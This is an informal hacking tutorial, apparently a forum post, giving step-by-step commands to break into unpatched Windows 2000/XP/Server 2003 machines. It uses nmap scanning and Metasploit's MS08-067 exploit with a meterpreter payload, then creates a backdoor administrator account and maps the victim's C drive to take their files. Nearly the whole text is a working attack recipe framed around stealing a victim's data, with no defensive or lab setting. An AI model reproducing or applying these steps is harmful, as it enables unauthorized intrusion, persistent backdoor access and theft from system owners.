Have you ever wondered how you could login as an Administrator, create your own account and get any files you want from a remote computer???? Well here’s how:
Q: On which Windows can the hack be done?
A: – Windows 2000 SP4
– Windows XP SP1/SP2
– Windows XP Pro x64
– Windows Server 2003 SP1
– Windows Server 2003 x64
Q: From/to what os are you attacking?
A: We are attacking from Debian Linux to Windows XP SP2.
– We download nmap (nmap.org) so that we can scan the remote pc.
– On the terminal we write: nmap -sS -O <target ip>
– If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be.
– Now we download Metasploit (metasploit.org) and we open it via the Terminal.
– Now that Metasploit is running we start the attack.
– We write at the terminal “show exploits” and we get a list of the avaliable exploits.
– We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi”
– Now we set RHOST to our victims ip: “set RHOST <target ip>”
– And RPORT to 445: “set RPORT 445”
– Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0” and hit ENTER again.
– OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp”
– IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER.
– If everything is ok you should see the following message: “[*] Meterpeter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)
– Meterpeter is running. We are inside the target pc!
– Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i”
– If it says “X:\WINDOWS\System32” then the mission is accomplished.
– Now lets create our own admin account.
– Write: “net user n0f4t3 mypass /add”. You should see a confirmation message saying “The command completed successfully.”
– Now lets make the account an admin: “net localgroup administrators n0f4t3 /add”.
– You should see again the confirmation message saying: “The command completed successfully.”
– Then type “exit” to exit CMD.
– OMG!! We made it!!! But how can we steal his files????
– We boot from Windows……….
– We go to “Start>Run”, we type “cmd” and we hit ENTER.
– Then we write “net use X: \\<target ip>\C mypass /user:n0f4t3” and hit ENTER.
– If that doesn’t work type “net use X: \\<target ip>\C: mypass /user:n0f4t3” and hit ENTER
– Now go to “My Computer” and you should see a new Drive called X:. Open it and enjoy the victim’s files.
That’s all Folks!!!
Microsoft for this great exploit!!
Metasploit and NMap.
Me (N0F@T3) for writing this tut.
MinSteRexS for posting an update!